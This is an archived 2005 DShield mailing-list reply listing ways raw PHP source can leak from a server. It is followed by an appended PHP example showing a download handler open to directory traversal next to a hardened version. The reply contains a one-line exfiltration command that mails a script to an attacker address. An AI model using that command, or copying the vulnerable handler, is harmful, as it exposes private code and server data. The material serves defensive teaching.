[Dshield] PHP Security and Privacy

Valdis.Kletnieks@vt.edu
Thu Dec 1 04:28:50 GMT 2005


On Wed, 30 Nov 2005 16:52:55 EST, David Cary Hart said:

> Other than rsync (which I have fully secured) are there any applications
> that would allow someone to fetch raw php source code in contrast to
> rendered html content?

ssh/scp/sftp.

ftp.

tftp (it's amazing how many sites get this wrong).

If they can run commands, they can always 'cat script.php | mail evilguy@aol.com'.

Directory traversal attacks on PHP or other cgi (or unsecured Apache configs).

Other security bugs in PHP scripts, allowing them to run commands, then see
the 'cat | mail' scenario.

Should I go on?
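As an added illustration of the directory-traversal vector listed above (example code, not from the post or the list): a PHP file-download handler in its vulnerable form next to a hardened version. DOWNLOAD_DIR and the extension allow-list are assumed values.

```php
<?php
// Added example, not code from the mailing-list post. A download handler that
// serves files from one fixed directory. The vulnerable version hands the
// user-supplied name straight to readfile(); "../" sequences walk out of the
// intended directory and return a script's source instead of its rendered
// output. The hardened version canonicalises the path and rejects anything
// outside the allowed directory or with a non-allowed extension.

define('DOWNLOAD_DIR', '/var/www/downloads');   // assumed location
$allowedExt = ['pdf', 'txt', 'zip'];            // assumed allow-list

// Vulnerable: no validation at all.
function serve_vulnerable(string $name): void {
    readfile(DOWNLOAD_DIR . '/' . $name);        // "../index.php" escapes the directory
}

// Hardened: reduce to a bare file name, resolve it, then confirm the result
// still lives under DOWNLOAD_DIR and has a permitted extension.
function resolve_safe(string $name, array $allowedExt): ?string {
    // Reject anything carrying directory components (slashes, "..").
    if ($name === '' || $name !== basename($name)) {
        return null;
    }
    $base = realpath(DOWNLOAD_DIR);
    $full = realpath(DOWNLOAD_DIR . '/' . $name);
    if ($base === false || $full === false) {
        return null;                               // directory or file missing
    }
    // realpath() collapses ".." and follows symlinks, so the prefix check
    // also catches a symlink inside the directory pointing elsewhere.
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                               // resolved outside the base directory
    }
    $ext = strtolower(pathinfo($full, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        return null;                               // .php is never served raw
    }
    return $full;
}

$path = resolve_safe($_GET['f'] ?? '', $allowedExt);
if ($path === null) {
    http_response_code(404);
    exit;
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
readfile($path);
```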